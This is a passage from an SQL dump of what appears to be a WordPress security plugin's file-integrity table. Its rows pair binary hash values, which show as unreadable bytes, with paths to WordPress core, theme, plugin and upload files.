','',0,'?'),('4�˟H��<�3`x�d','wp-content/plugins/wordpress-seo/src/presenters/admin/premium-badge-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L~�LI�U�����','�A��{�?\"c�Gbh��VXqE!z�ΰ�g.','',0,'?'),('4���X.-Ӳ��\nAJ','wp-content/plugins/wordfence/languages/wordfence.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�{��Iat:�/�',')�=炁h^V�9I���u��\\�<�\"��Y��','',0,'?'),('4���~~�&����Q0','wp-content/plugins/wordpress-seo/languages/wordpress-seo-hi_IN.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�veE�\"��]o','����N^�I�J0�bG>�7;өr�|�c5C�\r','',0,'?'),('4ڂ��L$�,K[�u��','xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�8\nP*�a|/ٳK','XdB�c\0���2��Ý��c���g�������','',0,'?'),('4�&Q:ͣ�ٙS\\& Qa','wp-content/plugins/wordpress-seo/src/helpers/author-archive-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tײ�m�ӭ1�\'O&y','��#�I��3\0/��9���]Z�d6�P�4\0�\'(','',0,'?'),('4�V���u,�Sܖk9��','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�N,���� �.','�(2Ф���~�J��������r�J��VsJ/!\n','',0,'?'),('5��0�J��@(\0`M','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M(�b\Z�;(�1i��','��b�/�c���(��X]ko��*��0w��\0��','',0,'?'),('54��Z�ʗ�HJ','wp-includes/blocks/rss/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��\"�s�~�^�n','�A+�ݍ�D-� f-o��O����f�','',0,'?'),('5��zb@dA�c>��A�','wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f������o}�\\F��','��x\\�b�GzU�,V�\0�W���`�C%4L�','',0,'?'),('5�?��y��<�2�','wp-admin/css/dashboard-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��)����.z�','�\0\\��3\n�4�A7�ݜ�&j3R��J?z��o�','',0,'?'),('5.=���d)<p�eu�s^','wp-includes/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��][W�)�B��y�','e3\nx��&\\āk���٦�|���V��s��','',0,'?'),('56AA���ѹ�A\r �','wp-content/plugins/wp-cerber/languages/wp-cerber-cs_CZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�[��w�]Q��J','��U7�e:�%�\Zp^���\r=��B���dc�}\n','',0,'?'),('58�d�`S61K>ۮ�v','wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\"���\"�6��3@�','��4��_�wl?�\\� p�Q(�#���y9�ͼ�','',0,'?'),('5A���o@�\Z�g�m','wp-content/languages/themes/twentytwenty-en_GB.mo',0,'���lN��P��u�:�','���lN��P��u�:�','�*,���\\�\rl<��D���W�zY�G��g�','',0,'?'),('5C�)\nWu�꽝/F�cK','wp-includes/js/plupload/wp-plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bi�^�̹�$�x�9}z�','3}�ʞi�����8]`���Q���ଧ%6','',0,'?'),('5H�_�% 1����Y�\r','wp-content/uploads/2016/11/interior-design-250x150.jpg',0,'��3Q�#�*�:�Ny�','��3Q�#�*�:�Ny�','���+,�*�Hj��\Z�����08JSx���','',0,'?'),('5S{�TƁ���e�/�','wp-includes/class-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ئ�:6[�>r>��S','������`�������\"}���j�\Z\ru���','',0,'?'),('5Z����Sμ�v�`6�9','wp-includes/version.php',0,'(p{U\n���⯎��','(p{U\n���⯎��','�=ݛ�=r}��Z��}f����s�g��','',0,'?'),('5\\h>��w ���N�','wp-includes/registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('5`�]\\ͭi\0���\ZJ�T','wp-includes/class-wp-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CCZb�2�h�:�d','c�n�V�0E<\'�x�/sJ�Ϙ��*0�\n� �','',0,'?'),('5vQS\0zX���B^���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؒ�ț�:��4k�W\\�','_��p�W�Ʋ�fs�r���;\"+�K+��o��bx','',0,'?'),('5��92���^�%<��','wp-admin/edit-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','às���EH� >\n�y','#ߘ�kfBQ&L��?����0-|�8D\ZH��\r�','',0,'?'),('5�7�N C=��-��c�','wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�D�K���zS§0','N�Q�*��TZ%P��%���jܑtZn/�','',0,'?'),('5�#t�5R�шK����','wp-content/wflogs/config-livewaf.php',0,':�n K�������,�',':�n K�������,�','Jo��$�)F���,èL���Ȋ��ke���','',0,'?'),('5�M�6:�Ӷ���,','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:X\\%?����ӥ','��ٜ�d��Xŀ�x�h��M��vw�$8','',0,'?'),('5�G�E�|#�\Z�5w�','wp-content/plugins/disable-gutenberg/inc/plugin-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O *�d,;�ϕ���','!��\"FAHi_S7��dy���>�\Z3���','',0,'?'),('5�2��>�&2KB�b�','wp-content/uploads/2019/09/garden-waste-150x150.jpg',0,'`/�n�ԡS��G&Ӛ�;','`/�n�ԡS��G&Ӛ�;','�����5f��̛��e�dQ��J��Mc�{�','',0,'?'),('5������;�o�','wp-content/plugins/wordpress-seo/js/dist/languages/ar-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�S�q���d˱!g8z�','P��gd8I�[�ԑ��|�Ű�M�p(�55��o','',0,'?'),('6����X/��HL','wp-includes/js/mediaelement/wp-playlist.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����X�l\"�o�','�/=àBAo&���I�1��]k~�N���','',0,'?'),('6c�k���6_sx$�>\"','wp-content/plugins/wp-cerber/assets/flags/et.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8������ZltS���\"','c��/s]\Z�`R��ꩧ`����E�����P�','',0,'?'),('6;I(�H�m�%��f�','wp-admin/css/farbtastic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\n���)�{��','T�=�Y#��[���vr�H�ia��R���','',0,'?'),('6W(\'�����P�4�','wp-content/plugins/wp-cerber/assets/flags/gn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������M�MH����,','����nr���A�[/�Á����*f|DeTJC�J','',0,'?'),('6[f�9�?�� _�','wp-content/plugins/wordfence/images/icons/bullet_yellow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&���Ɍ����ԔQ<','1���Nߗ����?*�i�í!F�Mp�9^.','',0,'?'),('6c�b��kk��i3�@�H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m}�#`:��Po/�','�(��˕�=9L�/��*m�,{o�7ܺhVT��\\','',0,'?'),('6iD��6�l��)�<�','wp-content/plugins/wordpress-seo/src/presenters/twitter/title-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�Ґ-��\r�Y݇','��.�n�Z�9��(�IuW�6]v0_�Uo+','',0,'?'),('6|nC��8�)�wi5�','wp-content/themes/vega/assets/js/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2Io�\0\n���=�','��1���J�u�{Y[���!6QFh�84^�w�','',0,'?'),('6�]j�v�W�k\r3-�','wp-admin/load-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ft_ov�в���','f�k�!RG4�;��jhnut֭���ʭd\ZW�n','',0,'?'),('6��ƌ���C���+','wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܇��X%�EWy�m\'��','�|�\rL�ʜэ�|�Ry��6S^�\\��','',0,'?'),('6�3ȓ+Ό�!��','wp-content/plugins/wordpress-seo/admin/ajax/class-shortcode-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CY�oy�4����%���','I%ik/�ȅ�����`D�Zm���Z�sY','',0,'?'),('6�b��C#$\Z� 3mu','wp-content/plugins/wordpress-seo/src/conditionals/admin/doing-post-quick-edit-save-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���-�o�Ed&���','� �s�\0Ր��E2�H���mཱ\n�Q�\n�','',0,'?'),('6�����`�5�f6�?�i','wp-content/plugins/wordpress-seo/admin/interface-installable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B��\nQI��<','Qf�j����Ų�yR�;c����r���\"�8+','',0,'?'),('6̠,��_���q��u�','wp-admin/includes/class-wp-filesystem-ftpext.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c- bn�C>����?','�3�m{e��lϝ�l�������v`��Y��','',0,'?'),('6٨ �:{�^D�','wp-includes/js/jquery/ui/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�o-�����q','���l�:�ͦ]�n���9cF����?�c','',0,'?'),('6�q��\"������','wp-content/themes/vega/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^q���/�$����','�|ћ����s�)�(���.��Y�~\\��&�?','',0,'?'),('7VB\\�%���B�V','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/SeekException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nx^l_�8:�p/9','ߐ�)t\'\\�&+ԘT�惤�%�Z�֏7��','',0,'?'),('7\"��妿W�\r��ѽ�','wp-content/plugins/wordfence/lib/menu_wordfence_central.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��Ǔ�GJ��','�2��ެ�ijB���]ƑF��BN3��yk�','',0,'?'),('76�6? X,��-�6�)�','wp-content/plugins/wp-cerber/assets/flags/eu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t;�zC�oػ�@���','��m��2����A�,��%(�#��%c)�+�w','',0,'?'),('7oj@��J� C�ȿ��','wp-includes/blocks/site-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�x�LS���','8�^ί��-�\'�%�J>�K%DL���?K�','',0,'?'),('7r��uF��@J,','wp-content/plugins/wordfence/lib/wfDateLocalization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�K_J�2Cmcͭ�t�','D��jy��,�Lw�a� <U��� ����S','',0,'?'),('7u� j��x�r5���','wp-content/plugins/redirection/locale/redirection-en_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3���z3��!��^-�','�.��8*�u�����jd�±���+o���i��Z','',0,'?'),('7w�1�J�0�k','wp-content/plugins/wordpress-seo/admin/capabilities/class-abstract-capability-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K렊o�����$`�','}A/�V\\���0\0ֿɘK�m�G��\n��?���s','',0,'?'),('7|oOU���z\0Ef���','wp-admin/network/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�;G_bu\'\\','�v,I/L^���ww\ZX1�2�y�T�ɣI��~','',0,'?'),('7�ua<�(.��L՝H(','wp-content/plugins/wordpress-seo/admin/views/interface-yoast-form-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N{\n�G\'�\rCj�B%','�T0V�l:\"��O� uU��u�Sv*��^bb','',0,'?'),('7�%Wy~P?�x��','wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('7�t�1V?Iá�\"�,�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sq.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V6�\r)ɽ�_�XWF��','m�TG�y\"csѩS;�߶��0�CF��l����~','',0,'?'),('7���o^l�:���B','wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��I�ݶ�3��S','!MڒޫDw����we(�!��=��ިd��,GW','',0,'?'),('7��jU��}@GdiS�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/TaskQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e!�Mc�e�W]','d��Z�;cq0{�� ��ʟ���㾒6(�G�K','',0,'?'),('7������@�r5��','wp-includes/blocks/gallery/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`��6?�o\'r��]�','�snWMd��x�2f1�ʌ�����9���','',0,'?'),('7�c�¢)��S�eb�','wp-includes/js/jquery/ui/menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��\"f_�2�eg�','�{�B��x��\r;f �2��4�/����4E�','',0,'?'),('7�c�.$P!�\"�','wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���j��_�ˊR�2','*��-�9�.���HGO6/�L�):�C�d�z�','',0,'?'),('7�ʅ���� ��;h��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iL�v.\\�Mug4�\rf','Ns�:mC������/��Zp�w����z����','',0,'?'),('7ϋ�t�d]B��?��','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/EnvNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�=&��� Wt�','�HS�l���8<*�p�3C��@ 2�a�','',0,'?'),('7�Y|7�^\Z����Vq','wp-includes/blocks/site-logo/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�J.�����~��','R�\\.��N���~�i71��Q��\rt�4�I9','',0,'?'),('7���k�X�f�Xm�S�','wp-includes/js/dist/vendor/wp-polyfill-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','El�*Ie��NZ�aK��','�K�+|���̫M5J�����y�0�It�lol','',0,'?'),('7�2��_R�D��;n�','wp-includes/blocks/block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ꆴ\n��\'��n:WrW','qF���)��\0�9B��YS���5��=(�','',0,'?'),('8�W�넧j�`���','wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-archive-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��>��nd��jh��I','�xy�Oax�H�6��Y�vbt�y�a�շ�v�Z','',0,'?'),('88��e�7Md�>�CW�','wp-content/plugins/wordpress-seo/admin/class-my-yoast-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?�����b','�$j���\'h�Q�Q���HTy�ݯ','',0,'?'),('8=�I��a�%��k�~�','wp-admin/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y�����e��','�:� ��z�=:&���%@����x�? ScS�','',0,'?'),('8?6B�\r��pl2�R�x','wp-content/wflogs/config-synced.php',0,'\"._�*{h��Y�,��','\"._�*{h��Y�,��','�`Gl�Y,.Eؐ%�86]\r���}L]��','',0,'?'),('8P֧�\Z�HGE}8�','wp-includes/Requests/Exception/HTTP/306.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wsz�uNP�j���Xu','4�U���Q\r1#_f������H���*I�dl��','',0,'?'),('8T��緶 �@��)\n','wp-content/plugins/wordpress-seo/languages/yoast-components-en_ZA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�Ytq�:Ux����J','b�KNY��wj��u�\n�:̍�HjWJ0�`$','',0,'?'),('8Y���v���C�[,��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:\0��>������}LQ\0','���_U\0]q=Չ��f�\\�/� @d��\r�+v�*(','',0,'?'),('8�R6�DH��q�-{�:`','wp-admin/includes/translation-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!>D�glM�<�mg�','\r�[��8*�5n݊��Pc���^8d%?f','',0,'?'),('8�@)��6yg[y�sQR','wp-admin/css/deprecated-media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��\"z���Pgw','���I�\'�Hk���,���1��5!u�.���2','',0,'?'),('8ÛZE�Q$}UP�T��','wp-content/plugins/wordfence/lib/wfCrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�铇�ܙ~�\r�m','%&��9� /D�XG�؞�߇��U�����4','',0,'?'),('8�~�#K9{u%�y�R�','wp-includes/js/dist/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rf�G�9��\"[���R\\','��yؙ�� 2+Ĺ�ʷ�Sw�����C۩ٳ~','',0,'?'),('8�Gxo\\��U���[�','wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ux��A�U���\'>R','��i��88�m����(^��6Q���xx�','',0,'?'),('8ܞt��\Zw�Nxa��','wp-includes/class-wp-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZM�ٟ�:�l\"pdΛ�','�%q2���Ӑ�F���JȑR~҃i���`;�>�','',0,'?'),('8�Ox��E�����Xo','wp-content/plugins/wordpress-seo/src/helpers/input-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@�q�� 0p�.\\��','~sg.E�it!5��u�^4#��D��u,��\"�','',0,'?'),('8��k�~у��aa뚓�','wp-content/plugins/wordfence/js/wfselect2.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������!�.���i','l�k}[�ZjA�.!��=+5�+�~q� 1','',0,'?'),('9�\r5\'X���>?�','wp-includes/js/customize-preview-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('9|���Q���ǷH��f','wp-content/plugins/wordfence/css/fullLog.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`���U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),('9\r�t�٘vZ�o>h}�','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-tracking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�S�^ +.,U\'�6��','���l����R���Rrp\"ȝ�y�6q','',0,'?'),('9ψ[�1d{���@','wp-includes/class.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DT����Y|49#y','�pf��\nYq�}����;yǧ�L��(���)��','',0,'?'),('9:��d�o\n��p`Ry��','wp-includes/js/tinymce/langs/wp-langs-en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�/�q��','����T����s���%���S�Z������','',0,'?'),('9@�\\�gv�үy���','wp-content/plugins/wordpress-seo/src/config/migrations/20201202144329_AddEstimatedReadingTime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2#v�Xj�};2�b�a�','�!���&��m�j�ÌJ���ċy��g�','',0,'?'),('9Es+��\naj)���','wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')���e\'���k�K�','��4��� N����� h1ևwI�ʇ��_�v','',0,'?'),('9R�a�?Kz}>�o�','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-suggestions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rf}r�-�h��5ޯ','�0&ܠU��S��V%oWE&����x��� �vE','',0,'?'),('9Z:��r��a\'\Z���o','wp-content/plugins/wordpress-seo/inc/health-check-links-table-not-accessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2TOfu�#�Sl`��','X�쒱�|�z�/:��9��\\*��ޞ���','',0,'?'),('9\\4;��J;���u�~�','wp-admin/images/freedom-4.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�[#���jR]*��','�-4�����&�o�s��v/1�^+UsR�M\n','',0,'?'),('9k�sB��=}��TŃc7','wp-includes/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('9v@�o�nr�����*','wp-content/plugins/wp-cerber/assets/flags/am.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�(v���ߩM�$Cݣn','�c4�n�6W����V�^�:�s��ݺ#����','',0,'?'),('9wv\r���^��!C�','wp-includes/blocks/image/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zi��]�TսO��\r�;�','gs&���|f�!\r��B˓B��.�sڍ�Ee','',0,'?'),('9|����nRo��Bt[�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f����rQ��N�L7\\�','!�/Բ�*<5����E��~��GYy&`��','',0,'?'),('9��c��O���','wp-content/plugins/redirection/models/url/url-flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g\'st1�+G�g�#��',',k�����Ԥ*r-+�Չ��-���mJ��','',0,'?'),('9�} B^��? �\"�','wp-includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wx� F�\\�(v��A�','�c�-7w�T�z��8v��Y�r��e��m+d�d','',0,'?'),('9��)�&��{Sd�G','wp-content/plugins/wp-cerber/assets/wp-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\0i�L�1���_��','��{Ո��R3i²�V���J}��0Ʀ�e\'\n �','',0,'?'),('9���y�S�� pV6=','wp-includes/blocks/quote/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Y�R\0�������7o','q��6���ث�k�!C�/q��s!_�yh{��','',0,'?'),('9���:��Ϸ��5f��','wp-content/uploads/2019/08/homeimprovements-300x200.jpg',0,'X�bo�,��;�BW�#','X�bo�,��;�BW�#','I<�\r�D��<�k�P���ֶ�_����d\r','',0,'?'),('9� �{b\nJc�F=lY','wp-includes/blocks/query-pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�u��\Z�C','�<�t���� �O��Ts�_�;�vSF+du�t','',0,'?'),('9�Ce;Y#�v|z��','wp-includes/blocks/audio/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','兩��J\"V,&�R��','ɲZ���=� �kX\n\r��27�$����\Z��','',0,'?'),('9ĠZq:j\nU�9(\Z\0��','wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�x[��/�؟[�N�','�S���3�hA���Θ����R)�+}�A���6','',0,'?'),('9������Q]�8�','wp-content/plugins/wordpress-seo/src/routes/indexables-head-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��a��S\r�-UW#�','x�a��a��l�6�4�_tk%ЮX֨��&�','',0,'?'),('9�6���,r�\\1�TC�[','wp-content/plugins/disable-gutenberg/css/font-icons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y9�<�e�kB�4��','{(��6pBi*���ɨϱ��u��l?\"�3I�','',0,'?'),('9ՍҢ��9��d\r�Y','wp-includes/ID3/license.commercial.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n;g��J�g����xA�','�t_2�x�<��-���˜wq�I�g���','',0,'?'),('9שyƣ�hw��','wp-includes/pomo/pomo/entry.php',0,'0�w3aAr���6VH%�2','0�w3aAr���6VH%�2','%���(\'��Q�[����y�B�� �O4AO7','',0,'?'),('9��s�3�SZ,p�8g','wp-includes/images/media/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),(':���b�OpDA��\nz~','wp-content/plugins/wordfence/css/wf-roboto-font.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]���O�uݵ�','�+�hJ~�ʆ��*��a*���Gb67�\r�:�','',0,'?'),(':�R���]$�b$#ꙣ','wp-content/uploads/2016/11/cropped-lost-places-150x150.jpg',0,'��X�m34���8��Z0�','��X�m34���8��Z0�','�AJ��I��g��湇�\ZP�oQ���j�3','',0,'?'),(':{���{7�9����','wp-admin/link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�gg��&ёb�� ��','(C<M�d*2Ƚ��*�N�t�n����T~��\ZW','',0,'?'),(':�|L�H6(��c�g��','wp-includes/ID3/module.audio.ogg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_2��\n$9��`m85','�6%u?E�M��l�Ȑ�@5vr�[�j\'t�H��f','',0,'?'),(':1�(�)p]V1�-ȩ�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qDL���a�[ ?�$','G�s\0��\r�/1�v=������pS-�yE.��U','',0,'?'),(':<�$��0,w\"&e({','wp-includes/class-feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),(':D�J�$�h��Dž\r�','wp-admin/js/customize-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�E߭WuaI�o|k','�R�/gO<��$�������]$�.�[i�','',0,'?'),(':S�ۦ=���G�B�0�','wp-content/plugins/wordpress-seo/src/exceptions/indexable/term-not-found-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I���<#�7`����','xa���������Bg�K1A�z���VX�','',0,'?'),(':\\ܹ\r@���L\"�:�U','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eL�F��T�2Ѯ�He','M��D�\nR卸�X����=���j���н','',0,'?'),(':�\\�4�������6','wp-content/uploads/2019/09/cleaning-3977589_960_720-updraft-pre-smush-original.jpg',0,'Һ*���m|dQ/ ','Һ*���m|dQ/ ','�E� 0�Y�7c��?��fᔠH[�=��*{','',0,'?'),(':���%H`!���\r�Z','wp-admin/js/media-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K;p�O�?F`h�w','�[��7�2��s���d`��������Mo','',0,'?'),(':���֣�}?��һ��','wp-content/uploads/2019/08/electrician-updraft-pre-smush-original.jpg',0,'�h�Oe��R�M��2��,','�h�Oe��R�M��2��,','�5s��\"���P��y�T�jz�+|%�j�','',0,'?'),(':�x��3�L&�3ſhD','wp-content/plugins/wp-cerber/assets/flags/mz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����v�)�Q�H�vz','�A�q#7����F�tˎ��Y�\\�j�ň�V:ܯ','',0,'?'),(':�yY\"b���i���','wp-content/plugins/wordpress-seo/src/integrations/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�s@b\Z�?���X','K}�p#l|�n]�/D�?��܀I�e4�!<��','',0,'?'),(':�%��(v5��q�0','wp-content/themes/twentytwentyone/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0ײ�O���\r�|��','��a�T��t����.t:��,�v��pڊ\0','',0,'?'),(':�?���Cׯu3wjA(','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> 